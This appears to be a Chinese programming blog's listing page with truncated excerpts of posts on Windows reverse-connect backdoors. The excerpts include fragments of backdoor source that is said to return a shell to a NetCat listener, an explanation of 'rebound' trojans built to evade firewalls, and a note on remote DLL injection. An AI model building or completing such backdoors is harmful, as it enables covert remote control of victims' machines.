反向连接零管道后门

/* 1k(程序体积1kb) 反向连接,零管道后门 By Anskya说明: 不用我多说了吧..黑客一般都会使用的后门程序.. 这里只是简单的演示一下..没有添加进程隐藏功能 程序可以在Win9x,Win2k,WinXP,Win2k3上使用 程序体积只有1k(FSG压缩一下会更小)测试: 本地开启NetCat等工具,监听80端口,会返回一个Shell*/#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")#pragma comment(linker,"/INCREMENT...
vc | 2009-03-08 12:35 | 阅读 2528 次 | 评论 0 条

反向连接后门源码

#include<winsock2.h>#include<stdio.h>#pragma comment(lib,"ws2_32.lib")void main(int argc,char **argv){char *messages = " ======================== BackConnect BackDoor V0.1 ======================== ========= Welcome to Http://www.hackerxfiles.net ========= "; WSADATA WSAData;SOCKET sock;SOCKADDR_I...
vc | 2009-03-08 12:34 | 阅读 2529 次 | 评论 0 条

打造经典的反向连接后门

随着安全事件的不断涌现,人们的主机防护意识越来越强,各种各样的防火墙和反病毒软件都开始对来自外部的网络连接进行监控,所以传统的采用正向连接的木马已经不再适应现在的网络环境了。为了能够继续进行远程控制,木马不得不从体制上进行改变,这就出现了采用反向连接技术的“反弹型”木马。“反弹”木马现在已经见得比较多了,但是对其技术细节介绍的文章还是比较少。从本质上来说,反向连接和正向连接的区别并不大。在正向连接的情况下,服务器端也就是被控制端,在编程实现的时候是采用服务器端的编程方法的;而控制端,在编程实现的时候采用的是客户端的编程方法。当我们采用反弹的方法编程的时候,实际上就是将被控制端变成了采...
vc | 2009-03-08 12:31 | 阅读 3499 次 | 评论 0 条

关于在DLL中获取主调用窗口的句柄

近来在弄远程DLL注入,在DLL中创建了窗口,因某种需要,需获取宿主窗口的句柄,找了n多资料都没有很好的解决办法,然后找到如下一篇文章: 通过进程ID获得该进程主窗口的句柄 一个进程可以拥有很多主窗口,也可以不拥有主窗口,所以这样的函数是不存在的,所幸的是,相反的函数是有的。所以我们可以调用EnumWindows来判断所有的窗口是否属于这个进程。typedef struct tagWNDINFO...{DWORD dwProcessId;HWND hWnd;} WNDINFO, *LPWNDINFO; BOOL CALLBACK YourEnumProc(HWND hW...